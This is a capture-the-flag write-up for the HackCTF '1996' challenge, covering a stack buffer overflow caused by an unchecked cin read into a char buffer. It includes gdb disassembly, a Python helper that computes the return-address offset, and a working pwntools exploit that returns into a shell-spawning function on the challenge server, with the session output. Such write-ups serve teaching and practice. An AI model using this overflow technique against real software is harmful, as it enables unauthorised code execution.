
[HackCTF] 1996

Intro

Hello :D

Is it just me, or are the 200-point problems the easier ones..?

This one is also built around the "read an environment variable" idea, but it comes down to a plain stack BOF lol

Let's get started!!

Write UP

root@goorm:/workspace/LCH_Server/HackCTF/14.1996# ./1996
Which environment variable do you want to read? USER
USER=root

It reads back an environment variable, so there should be a call to something like getenv().

gdb-peda$ pd main
Dump of assembler code for function main:
   0x00000000004008cd <+0>:     push   rbp
   0x00000000004008ce <+1>:     mov    rbp,rsp
   0x00000000004008d1 <+4>:     push   rbx
   0x00000000004008d2 <+5>:     sub    rsp,0x408
   0x00000000004008d9 <+12>:    lea    rsi,[rip+0x188]        # 0x400a68
   0x00000000004008e0 <+19>:    lea    rdi,[rip+0x200779]        # 0x601060 <std::cout@@GLIBCXX_3.4>
   0x00000000004008e7 <+26>:    call   0x400760 <std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*)@plt>
   0x00000000004008ec <+31>:    lea    rax,[rbp-0x410]
   0x00000000004008f3 <+38>:    mov    rsi,rax
   0x00000000004008f6 <+41>:    lea    rdi,[rip+0x200883]        # 0x601180 <std::cin@@GLIBCXX_3.4>
   0x00000000004008fd <+48>:    call   0x400740 <std::basic_istream<char, std::char_traits<char> >& std::operator>><char, std::char_traits<char> >(std::basic_istream<char, std::char_traits<char> >&, char*)@plt>
   0x0000000000400902 <+53>:    lea    rax,[rbp-0x410]
   0x0000000000400909 <+60>:    mov    rsi,rax
   0x000000000040090c <+63>:    lea    rdi,[rip+0x20074d]        # 0x601060 <std::cout@@GLIBCXX_3.4>
   0x0000000000400913 <+70>:    call   0x400760 <std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*)@plt>
   0x0000000000400918 <+75>:    lea    rsi,[rip+0x17a]        # 0x400a99
   0x000000000040091f <+82>:    mov    rdi,rax
   0x0000000000400922 <+85>:    call   0x400760 <std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*)@plt>
   0x0000000000400927 <+90>:    mov    rbx,rax
   0x000000000040092a <+93>:    lea    rax,[rbp-0x410]
   0x0000000000400931 <+100>:   mov    rdi,rax
   0x0000000000400934 <+103>:   call   0x400780 <getenv@plt>
   0x0000000000400939 <+108>:   mov    rsi,rax
   0x000000000040093c <+111>:   mov    rdi,rbx
   0x000000000040093f <+114>:   call   0x400760 <std::basic_ostream<char, std::char_traits<char> >& std::operator<< <std::char_traits<char> >(std::basic_ostream<char, std::char_traits<char> >&, char const*)@plt>
   0x0000000000400944 <+119>:   mov    rdx,rax
   0x0000000000400947 <+122>:   mov    rax,QWORD PTR [rip+0x200692]        # 0x600fe0
   0x000000000040094e <+129>:   mov    rsi,rax
   0x0000000000400951 <+132>:   mov    rdi,rdx
   0x0000000000400954 <+135>:   call   0x400770 <std::ostream::operator<<(std::ostream& (*)(std::ostream&))@plt>
   0x0000000000400959 <+140>:   mov    eax,0x0
   0x000000000040095e <+145>:   add    rsp,0x408
   0x0000000000400965 <+152>:   pop    rbx
   0x0000000000400966 <+153>:   pop    rbp
   0x0000000000400967 <+154>:   ret
End of assembler dump.

Sure enough, getenv() is there at main+103.

But look at main+31 through main+48: that is cin >> buf with buf at [rbp-0x410], and since buf is a plain char array, operator>>(istream&, char*) keeps copying until it hits whitespace. There is no length check anywhere.

The frame is laid out by the prologue: push rbp, push rbx (saved rbx lands at [rbp-8]), sub rsp,0x408 (buf at [rbp-0x410]). So 0x410 bytes of "A" run from buf up to the saved rbp, 8 more cover the saved rbp, and the next 8 bytes replace the return address: "A" * (0x410 + 8) + RET gives us the BOF.
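To make the offset derivation and the one caveat of this bug explicit, here is a small stdlib-only Python helper. It is added for this write-up and is not part of the original exploit or the challenge; the constants (buffer offset 0x410, spawn_shell at 0x400897) are read from the disassembly above, and struct is used instead of pwntools' p64 so it runs without pwntools. The check matters because cin >> char* stops at the first isspace() byte, so a target address containing 0x20 or 0x09-0x0d would be silently truncated.

```python
import struct

# Frame layout of main, from the prologue in the disassembly:
#   push rbp          ; saved rbp at [rbp]
#   push rbx          ; saved rbx at [rbp-8]
#   sub  rsp, 0x408   ; locals; the input buffer is at [rbp-0x410]
BUF_OFFSET_FROM_RBP = 0x410   # lea rax,[rbp-0x410]
SPAWN_SHELL = 0x400897        # address of spawn_shell from the disassembly

# Bytes that operator>>(istream&, char*) treats as a field terminator in the
# "C" locale (isspace): space, \t, \n, \v, \f, \r. Any of these inside the
# overwrite ends the read early and the return address is not fully written.
CIN_DELIMITERS = b" \t\n\v\f\r"


def ret_offset(buf_offset_from_rbp):
    """Distance in bytes from the start of the buffer to the saved return address.

    Everything from [rbp-buf_offset] up to and including the saved rbp is
    buf_offset bytes (locals, saved rbx, saved rbp); the return address sits
    in the next 8 bytes above rbp.
    """
    return buf_offset_from_rbp + 8


def build_payload(target, buf_offset_from_rbp=BUF_OFFSET_FROM_RBP):
    """Padding up to the return address, then the target as little-endian u64."""
    padding = b"A" * ret_offset(buf_offset_from_rbp)
    return padding + struct.pack("<Q", target)


def check_delimiters(payload):
    """Positions of bytes cin >> would stop at. Must be empty for the
    overwrite to reach the return address intact."""
    return [i for i, b in enumerate(payload) if b in CIN_DELIMITERS]


if __name__ == "__main__":
    payload = build_payload(SPAWN_SHELL)
    print("offset to RET:", ret_offset(BUF_OFFSET_FROM_RBP))
    print("payload length:", len(payload))
    print("delimiter bytes at:", check_delimiters(payload))
```

With spawn_shell the packed address is 97 08 40 00 00 00 00 00, none of which is whitespace, so the whole overwrite lands; the newline that sendline() appends comes after the address and is what terminates the read. The NUL bytes are fine too, since operator>> does not stop on 0x00. One more thing worth knowing: spawn_shell calls execve() directly rather than system(), so the 16-byte stack-alignment crash you sometimes get when returning straight into a libc function does not come up here.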

gdb-peda$ pd spawn_shell
Dump of assembler code for function _Z11spawn_shellv:
   0x0000000000400897 <+0>:     push   rbp
   0x0000000000400898 <+1>:     mov    rbp,rsp
   0x000000000040089b <+4>:     sub    rsp,0x10
   0x000000000040089f <+8>:     lea    rax,[rip+0x1b3]        # 0x400a59
   0x00000000004008a6 <+15>:    mov    QWORD PTR [rbp-0x10],rax
   0x00000000004008aa <+19>:    mov    QWORD PTR [rbp-0x8],0x0
   0x00000000004008b2 <+27>:    lea    rax,[rbp-0x10]
   0x00000000004008b6 <+31>:    mov    edx,0x0
   0x00000000004008bb <+36>:    mov    rsi,rax
   0x00000000004008be <+39>:    lea    rdi,[rip+0x194]        # 0x400a59
   0x00000000004008c5 <+46>:    call   0x4007a0 <execve@plt>
   0x00000000004008ca <+51>:    nop
   0x00000000004008cb <+52>:    leave
   0x00000000004008cc <+53>:    ret
End of assembler dump.

And they kindly implemented a function that drops a shell for us: spawn_shell builds a one-element argv on its stack and calls execve() with the string at 0x400a59, so all we have to do is return into 0x400897.

Here's the exploit.

from pwn import *

#p = process("./1996")
p = remote("ctf.j0n9hyun.xyz", 3013)

shell = 0x400897          # spawn_shell()

p.recvuntil(b"read? ")

# 0x410 bytes from buf reach the saved rbp (buffer + saved rbx),
# 8 more overwrite it, then the next 8 bytes are the return address
payload  = b"A" * 1048
payload += p64(shell)

p.sendline(payload)

p.interactive()
[+] Opening connection to ctf.j0n9hyun.xyz on port 3013: Done
[*] Switching to interactive mode
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x9@=$
$ ls
flag
main
$ cat flag
///flag!!

Exploit!!

Wrap-up

Uh.. that was a bit underwhelming.. let's move on lol

Thanks :D
